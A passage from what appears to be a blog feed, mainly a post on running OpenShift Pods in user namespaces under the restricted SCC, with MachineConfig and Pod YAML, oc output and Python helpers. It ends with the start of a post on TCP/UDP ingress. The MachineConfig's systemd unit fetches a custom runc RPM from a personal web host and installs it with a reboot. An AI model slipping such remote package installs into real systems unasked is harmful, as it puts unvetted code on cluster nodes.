<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;override-runc.service&quot;</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">enabled</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a><span class="fu">        contents</span><span class="kw">: </span><span class="ch">|</span></span>
<span id="cb1-20"><a href="#cb1-20" aria-hidden="true" tabindex="-1"></a>          [Unit]</span>
<span id="cb1-21"><a href="#cb1-21" aria-hidden="true" tabindex="-1"></a>          Description=Install runc override</span>
<span id="cb1-22"><a href="#cb1-22" aria-hidden="true" tabindex="-1"></a>          After=network-online.target rpm-ostreed.service</span>
<span id="cb1-23"><a href="#cb1-23" aria-hidden="true" tabindex="-1"></a>          [Service]</span>
<span id="cb1-24"><a href="#cb1-24" aria-hidden="true" tabindex="-1"></a>          ExecStart=/bin/sh -c &#39;rpm -q runc-1.0.3-992.rhaos4.10.el8.x86_64 || rpm-ostree override replace --reboot https://ftweedal.fedorapeople.org/runc-1.0.3-992.rhaos4.10.el8.x86_64.rpm&#39;</span>
<span id="cb1-25"><a href="#cb1-25" aria-hidden="true" tabindex="-1"></a>          Restart=on-failure</span>
<span id="cb1-26"><a href="#cb1-26" aria-hidden="true" tabindex="-1"></a>          [Install]</span>
<span id="cb1-27"><a href="#cb1-27" aria-hidden="true" tabindex="-1"></a>          WantedBy=multi-user.target</span>
<span id="cb1-28"><a href="#cb1-28" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">storage</span><span class="kw">:</span></span>
<span id="cb1-29"><a href="#cb1-29" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">files</span><span class="kw">:</span></span>
<span id="cb1-30"><a href="#cb1-30" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subuid</span></span>
<span id="cb1-31"><a href="#cb1-31" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-32"><a href="#cb1-32" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-33"><a href="#cb1-33" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb1-34"><a href="#cb1-34" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subgid</span></span>
<span id="cb1-35"><a href="#cb1-35" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-36"><a href="#cb1-36" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-37"><a href="#cb1-37" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb1-38"><a href="#cb1-38" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/crio/crio.conf.d/99-crio-userns.conf</span></span>
<span id="cb1-39"><a href="#cb1-39" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-40"><a href="#cb1-40" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-41"><a href="#cb1-41" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS53b3JrbG9hZHMub3BlbnNoaWZ0LXVzZXJuc10KYWN0aXZhdGlvbl9hbm5vdGF0aW9uID0gImlvLm9wZW5zaGlmdC51c2VybnMiCmFsbG93ZWRfYW5ub3RhdGlvbnMgPSBbCiAgImlvLmt1YmVybmV0ZXMuY3JpLW8udXNlcm5zLW1vZGUiLAogICJpby5rdWJlcm5ldGVzLmNyaS1vLmNncm91cDItbW91bnQtaGllcmFyY2h5LXJ3IiwKICAiaW8ua3ViZXJuZXRlcy5jcmktby5EZXZpY2VzIgpdCg==</span></span></code></pre></div>
<p>The main parts of this <code>MachineConfig</code> are:</p>
<ul>
<li><p>The <strong><code>kernelArguments</code></strong> enable cgroups v2, which is not strictly
required for this demo, but is required for running systemd-based
workloads.</p></li>
<li><p>The <strong><code>override-runc.service</code></strong> systemd unit installs a custom
version of runc that implements the new <a href="https://github.com/opencontainers/runtime-spec/blob/8958f93039ab90be53d803cd7e231a775f644451/config-linux.md#cgroup-ownership">OCI Runtime Specification
cgroup ownership semantics</a>.
This should be the default behaviour in future versions of
OpenShift, perhaps as soon as OpenShift 4.11.</p></li>
<li><p><strong><code>/etc/subuid</code></strong> and <strong><code>/etc/subgid</code></strong> provide a sub-id mapping range
for CRI-O to use when creating Pods with user namespaces.</p></li>
<li><p><strong><code>/etc/crio/crio.conf.d/99-crio-userns.conf</code></strong> defines the
<code>io.openshift.userns</code> workload type for CRI-O. It is also not
strictly necessary for this demo but is required for systemd-based
workloads to run successfully. The default CRI-O configuration in
OpenShift 4.10 provides the <code>io.openshift.builder</code> workload type,
which is sufficient if your workload does not need to manage
cgroups.</p></li>
</ul>
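<p>The <code>contents.source</code> values in the <code>MachineConfig</code> are base64-encoded
<code>data:</code> URLs, so the file contents are not readable at a glance. The
following is a minimal Python sketch for decoding one. The helper name
<code>decode_data_url</code> is my own and is not part of any OpenShift tooling;
the encoded string is copied from the <code>/etc/subuid</code> entry above.</p>

```python
import base64

# Value copied from the /etc/subuid and /etc/subgid entries in the MachineConfig.
SUBID_SOURCE = (
    "data:text/plain;charset=utf-8;base64,"
    "Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg=="
)


def decode_data_url(url):
    """Return the text payload of a base64-encoded data: URL."""
    header, _, payload = url.partition(",")
    if not header.endswith(";base64"):
        raise ValueError("expected a base64 data URL")
    return base64.b64decode(payload).decode("utf-8")


if __name__ == "__main__":
    # Print the decoded sub-id file exactly as it would appear on the node.
    print(decode_data_url(SUBID_SOURCE), end="")
```

<p>The decoded file holds two sub-id entries, one for <code>core</code> and one for
<code>containers</code>, each in the usual <code>name:start:count</code> form.</p>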
<p>Aside from the node configuration changes, I (as cluster admin) also
created a project and a user account to use for the subsequent steps:</p>
<pre class="shell"><code>% oc new-project test
Now using project &quot;test&quot; on server &quot;https://api.ci-ln-5rkyxfb-72292.origin-ci-int-gce.dev.rhcloud.com:6443&quot;.
…

% oc create user test
user.user.openshift.io/test created

% oc adm policy add-role-to-user edit test
clusterrole.rbac.authorization.k8s.io/edit added: &quot;test&quot;</code></pre>
<p>I did not assign any special SCCs to the <code>test</code> user account.</p>
<div class="note">
<p>Remember to wait for the Machine Config Operator to finish updating
the worker nodes before proceeding with Pod creation. You can use
<code>oc wait</code> to await this condition:</p>
<pre class="shell"><code>% oc wait mcp/worker \
    --for condition=updated --timeout=-1s</code></pre>
</div>
<h2 id="problem-demonstration">Problem demonstration <a href="#problem-demonstration" class="section">§</a></h2>
<p>The objective is to run a Pod in a user namespace, with that Pod
being admitted via the default <code>restricted</code> SCC. We will start with
the following Pod definition:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb4-9"><a href="#cb4-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb4-10"><a href="#cb4-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb4-11"><a href="#cb4-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb4-12"><a href="#cb4-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span></code></pre></div>
<p>The <strong><code>io.openshift.userns</code></strong> annotation selects the CRI-O workload
profile that we added via the <code>MachineConfig</code> above. This profile
enables several other annotations, but does not automatically
execute the Pod in a user namespace. For that, you must <em>also</em>
supply the <strong><code>io.kubernetes.cri-o.userns-mode</code></strong> annotation. Its
argument tells CRI-O to automatically select a unique host UID range
of size 65536 to map into the container’s user namespace.</p>
<p>I created the Pod as user <code>test</code>:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
pod/fedora created</code></pre>
<p>Observe that it was admitted via the <code>restricted</code> SCC:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
    | jq &#39;.metadata.annotations.&quot;openshift.io/scc&quot;&#39;
&quot;restricted&quot;</code></pre>
<p>Unfortunately, the container is not running:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
  | jq &#39;.status.containerStatuses[].state&#39;
{
  &quot;waiting&quot;: {
    &quot;message&quot;: &quot;container create failed: time=\&quot;2022-02-02T05:43:34Z\&quot; level=error msg=\&quot;container_linux.go:380: starting container process caused: setup user: cannot set uid to unmapped user in user namespace\&quot;\n&quot;,
    &quot;reason&quot;: &quot;CreateContainerError&quot;
  }
}</code></pre>
<p>The core error message is: <strong><em>cannot set uid to unmapped user in
user namespace</em></strong>. This arises because, in the absence of a
<code>runAsUser</code> specification in the PodSpec, the <code>restricted</code> SCC has
defaulted it to a value from the UID range assigned to the project:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
  | jq &#39;.spec.containers[].securityContext.runAsUser&#39;
1000650000</code></pre>
<p>The project UID range allocation is recorded in the project and
namespace annotations:</p>
<pre class="shell"><code>% oc get -o json project/test namespace/test \
    | jq &#39;.items[].metadata.annotations.&quot;openshift.io/sa.scc.uid-range&quot;&#39;
&quot;1000650000/10000&quot;
&quot;1000650000/10000&quot;</code></pre>
<p>OpenShift allocated to project <code>test</code> a range of 10000 UIDs starting
at <code>1000650000</code>. The error arises because UID <code>1000650000</code> is not
mapped in the user namespace. The host UID range may be something
like <code>200000</code>–<code>265535</code>, whereas the sandbox’s UID range is
<code>0</code>–<code>65535</code>.</p>
<p>I deleted the Pod and will try something different:</p>
<pre class="shell"><code>% oc delete pod/fedora
pod &quot;fedora&quot; deleted</code></pre>
<p>Let’s say that we want to run the container process as UID <code>0</code> <em>in
the Pod’s user namespace</em>, as would be required for a systemd-based
workload. Instead of leaving it to the SCC machinery, I’ll set
<code>runAsUser: 0</code> in the PodSpec myself:</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb11-1"><a href="#cb11-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb11-2"><a href="#cb11-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb11-3"><a href="#cb11-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb11-4"><a href="#cb11-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb11-5"><a href="#cb11-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb11-6"><a href="#cb11-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb11-7"><a href="#cb11-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb11-8"><a href="#cb11-8" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb11-9"><a href="#cb11-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb11-10"><a href="#cb11-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb11-11"><a href="#cb11-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb11-12"><a href="#cb11-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span>
<span id="cb11-13"><a href="#cb11-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb11-14"><a href="#cb11-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">runAsUser</span><span class="kw">:</span><span class="at"> </span><span class="dv">0</span></span></code></pre></div>
<p>This time the <code>test</code> user cannot even create the Pod:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
Error from server (Forbidden): error when creating &quot;pod-fedora.yaml&quot;…</code></pre>
<p>I’ve trimmed the rather long error message, but the core problem is:</p>
<pre><code>spec.containers[0].securityContext.runAsUser: Invalid value:
0: must be in the ranges: [1000650000, 1000659999]</code></pre>
<p>The <code>restricted</code> SCC only allows <code>runAsUser</code> values that fall in the
project’s assigned UID range. And this is what we would expect. The
problem is that the admission machinery has no awareness of user
namespaces. It cannot discern that <code>runAsUser: 0</code> means that we
want to run as UID <code>0</code> <em>inside the user namespace</em>, whilst mapped to
an unprivileged UID on the host.</p>
<p>The problem is twofold. First, we are unable to control the UID
mapping that CRI-O gives us, so that it would coincide with the
project’s UID range. Second, the SCC admission checks and
defaulting are oblivious to user namespaces. <code>runAsUser</code> is
interpreted as referring to host UIDs, and the <code>restricted</code> SCC
restricts (or defaults) us to values that are not mapped in the
Pod’s user namespace.</p>
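<p>To make the conflict concrete, here is a small Python sketch that
models the two checks as plain range tests. It is a simplification for
illustration only, not how the SCC admission code or CRI-O are
implemented. The names <code>in_range</code> and <code>diagnose</code> are hypothetical;
the numbers come from the command output shown earlier.</p>

```python
def in_range(uid, start, length):
    """True if uid lies in the half-open range [start, start + length)."""
    return uid in range(start, start + length)


# Figures taken from the command output earlier in the post.
PROJECT_RANGE = (1000650000, 10000)  # openshift.io/sa.scc.uid-range
USERNS_RANGE = (0, 65536)            # UIDs inside the Pod (auto:size=65536)


def diagnose(run_as_user):
    """Report whether a runAsUser value is admitted and whether it is mapped."""
    return {
        "admitted_by_restricted": in_range(run_as_user, *PROJECT_RANGE),
        "mapped_in_userns": in_range(run_as_user, *USERNS_RANGE),
    }


if __name__ == "__main__":
    # The defaulted UID is admitted but unmapped; UID 0 is mapped but rejected.
    for uid in (1000650000, 0):
        print(uid, diagnose(uid))
```

<p>Without further help, no single <code>runAsUser</code> value satisfies both
conditions: the two ranges do not overlap.</p>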
<h2 id="solution">Solution <a href="#solution" class="section">§</a></h2>
<p>The <code>map-to-root</code> option in the <code>userns-mode</code> annotation provides a
solution to this dilemma. It takes whatever value <code>runAsUser</code> is,
and ensures that that host UID gets mapped to UID <code>0</code> in the Pod
user namespace. The updated PodSpec is:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="st">&quot;auto:size=65536;map-to-root=true&quot;</span></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">runAsUser</span><span class="kw">:</span><span class="at"> </span><span class="dv">1000650000</span></span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb14-15"><a href="#cb14-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span></code></pre></div>
<p>Now the Pod is able to run:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
pod/fedora created

% oc get -o json pod/fedora \
  | jq &#39;.spec.nodeName, .status.containerStatuses[].state&#39;
&quot;ci-ln-fizz88k-72292-9phfc-worker-c-7s99v&quot;
{
  &quot;running&quot;: {
    &quot;startedAt&quot;: &quot;2022-02-02T06:20:49Z&quot;
  }
}</code></pre>
<p>We can observe the UID mapping:</p>
<pre class="shell"><code>% oc rsh pod/fedora cat /proc/self/uid_map
         1     265536      65535
         0 1000650000          1</code></pre>
<p>This shows that UID <code>0</code> in the Pod’s user namespace maps to UID
<code>1000650000</code> in the parent (host) user namespace. The remaining
UIDs <code>1</code>–<code>65535</code> in the Pod’s user namespace are mapped contiguously
from UID <code>265536</code> in the host user namespace.</p>
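<p>Each line of <code>uid_map</code> gives the first UID inside the namespace, the
first UID in the parent namespace, and the length of the range. As a
rough sketch, the translation can be reproduced in a few lines of
Python. The function names <code>parse_uid_map</code> and <code>to_host_uid</code> are my
own, and the map text is copied from the output above.</p>

```python
# uid_map contents copied from the running Pod.
UID_MAP = """\
         1     265536      65535
         0 1000650000          1
"""


def parse_uid_map(text):
    """Parse uid_map lines into (inside_start, outside_start, count) tuples."""
    return [
        tuple(int(field) for field in line.split())
        for line in text.splitlines()
        if line.strip()
    ]


def to_host_uid(entries, uid):
    """Translate a UID inside the namespace to the parent namespace, or None."""
    for inside, outside, count in entries:
        if uid in range(inside, inside + count):
            return outside + (uid - inside)
    return None  # the UID is not mapped


if __name__ == "__main__":
    entries = parse_uid_map(UID_MAP)
    for uid in (0, 1, 65535, 65536):
        print(uid, to_host_uid(entries, uid))
```

<p>An unmapped UID, such as <code>65536</code> here, has no counterpart in the host
user namespace, which is the condition behind the earlier <em>unmapped user</em>
error.</p>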
<p>Objective achieved.</p>
<h3 id="why-runasuser-must-be-specified">Why <code>runAsUser</code> must be specified <a href="#why-runasuser-must-be-specified" class="section">§</a></h3>
<p>Referring back to the PodSpec, why is it necessary to explicitly
specify <code>runAsUser</code>? Doesn’t the SCC admission machinery
automatically set the default value? Well… yes, and no. The SCC
machinery defaults <code>runAsUser</code> in each <em>container’s</em>
<code>securityContext</code> field. But it does not set it in the <em>Pod’s</em>
<code>securityContext</code>. And it is the <em>Pod</em> <code>securityContext</code> that CRI-O
examines when processing the <code>map-to-root</code> option. If it is unset,
<code>CRI-O</code> will not set the mapping up properly and container(s) will
fail to run.</p>
<p>The consequence of this is that the user or operator creating the
Pod must first examine the Project or Namespace object to learn what
its assigned UID range is. Then it must set the
<code>spec.securityContext.runAsUser</code> field to the start value of that
range. The range assignment will certainly differ from project to
project so it cannot be hardcoded. This is a bit annoying: more
work for the human operator, or more automation behaviour to
implement and maintain.</p>
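<p>As an illustration of that extra automation, the following Python
sketch fills in the Pod-level <code>runAsUser</code> from the namespace’s
<code>openshift.io/sa.scc.uid-range</code> annotation. It works on plain
dictionaries (for example, parsed <code>oc get -o json</code> output) and makes
no API calls. The function names <code>range_start</code> and
<code>with_pod_run_as_user</code> are hypothetical.</p>

```python
import copy

UID_RANGE_ANNOTATION = "openshift.io/sa.scc.uid-range"


def range_start(annotations):
    """Return the first UID of a "start/length" range annotation."""
    start, _, _length = annotations[UID_RANGE_ANNOTATION].partition("/")
    return int(start)


def with_pod_run_as_user(pod, namespace_annotations):
    """Return a copy of pod with spec.securityContext.runAsUser set if unset."""
    pod = copy.deepcopy(pod)  # leave the caller's object untouched
    security_context = pod.setdefault("spec", {}).setdefault("securityContext", {})
    security_context.setdefault("runAsUser", range_start(namespace_annotations))
    return pod


if __name__ == "__main__":
    namespace_annotations = {UID_RANGE_ANNOTATION: "1000650000/10000"}
    pod = {"apiVersion": "v1", "kind": "Pod", "spec": {"containers": []}}
    print(with_pod_run_as_user(pod, namespace_annotations)["spec"]["securityContext"])
```

<p>An explicitly specified <code>runAsUser</code> is left alone, so the sketch only
supplies the value when the Pod author has not.</p>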
<p>The simplest solution I can think of is to enhance the SCC
processing to also set <code>spec.securityContext.runAsUser</code> if it is
unset. Then CRI-O would see the value it needs to see.
Alternatively CRI-O could be enhanced to check the container
<code>securityContext</code> if the <code>runAsUser</code> is not specified in the Pod
<code>securityContext</code>. But to me this seems ill-principled because
different containers (in the same Pod) could specify different
values, and there is no obvious “right” way to resolve the
ambiguities.</p>
<h2 id="using-multiple-uids">Using multiple UIDs <a href="#using-multiple-uids" class="section">§</a></h2>
<p>Although I have a nice range of 65536 UIDs mapped in the Pod’s user
namespace, I am not able to run processes as any UID other than <code>0</code>.
This is because the <code>restricted</code> SCC forcibly omits <code>CAP_SETUID</code>
(among others) from the capability bounding set of the container
process. Complex workloads, including any based on systemd, will
fail to run properly under such a constraint.</p>
<p>The simplest workaround is to admit the Pod via the <code>anyuid</code> SCC.
But that undoes the good outcome achieved in this post!</p>
<p>An intermediate workaround is to create a new SCC that does not
forcibly deprive containers of <code>CAP_SETUID</code>. This entails
administrative overhead.</p>
<p>It also increases the attack surface. The <code>setuid(2)</code> system call
is restricted to UIDs mapped in the user namespace of the calling
process. If the calling process is in an isolated user namespace
that maps to unprivileged host UIDs, it is safe (up to kernel bugs)
to grant <code>CAP_SETUID</code> to that process. But recall that user
namespaces are still opt-in; by default Pods use the host user
namespace. An SCC can use <code>MustRunAsRange</code> to restrict the
<em>initial</em> container process to running as a user in the project’s
assigned UID range. But if that SCC also lets containers use
<code>CAP_SETUID</code>, then it doesn’t really provide more protection than
<code>anyuid</code>.</p>
<p>A more robust solution would be to modify CRI-O to <em>reinstate</em>
<code>CAP_SETUID</code> and related capabilities when the Pod runs in a user
namespace. I will raise the topic with the CRI-O maintainers, as
solving this problem is important for our use case, and probably
other “legacy” workloads too.</p>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>In this post I demonstrated how to run workloads in a user namespace
on OpenShift, under the default <code>restricted</code> SCC. The <code>map-to-root</code>
option is critical to accomplishing this. There is an unfortunate
“rough edge” in that the workload must specifically refer to the UID
range assigned to the namespace in which the Pod will live, which
means additional work for or complexity in the operator (human or
otherwise).</p>
<p>Despite this progress, if you need to run processes under different
UIDs in the container(s), the <code>restricted</code> SCC won’t work because it
deprives the container process of the <code>CAP_SETUID</code> capability. You
must go back to admitting the workload via <code>anyuid</code> or a similar
SCC, which is a significant erosion of the security boundaries
between containers and the host. This issue will be the subject of
future investigations.</p>]]></summary>
</entry>
<entry>
    <title>Bare TCP and UDP ingress on Kubernetes</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-11-18-k8s-tcp-udp-ingress.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-11-18-k8s-tcp-udp-ingress.html</id>
    <published>2021-11-18T00:00:00Z</published>
    <updated>2021-11-18T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="bare-tcp-and-udp-ingress-on-kubernetes">Bare TCP and UDP ingress on Kubernetes</h1>
<p>Kubernetes and OpenShift have good solutions for routing HTTP/HTTPS
traffic to the right applications. But for ingress of bare TCP
(that is, not HTTP(S) or TLS with SNI) or UDP traffic, the situation
is more complicated. In this post I demonstrate how to use
<code>LoadBalancer</code> Service objects to route bare TCP and UDP traffic to
your Kubernetes applications.</p>
<h2 id="example-service">Example service <a href="#example-service" class="section">§</a></h2>
<p>For testing purposes I wrote a basic echo server. It listens on
both TCP and UDP port 12345, and merely upper-cases and returns the
data it receives:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> socketserver</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> threading</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> serve_tcp():</span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">class</span> Handler(socketserver.StreamRequestHandler):</span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>        <span class="kw">def</span> handle(<span class="va">self</span>):</span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a>            <span class="cf">while</span> <span class="va">True</span>:</span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a>                data <span class="op">=</span> <span class="va">self</span>.rfile.readline()</span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a>                <span class="cf">if</span> <span class="kw">not</span> data:</span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a>                    <span class="cf">break</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a>                <span class="va">self</span>.wfile.write(data.upper())</span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a></span>
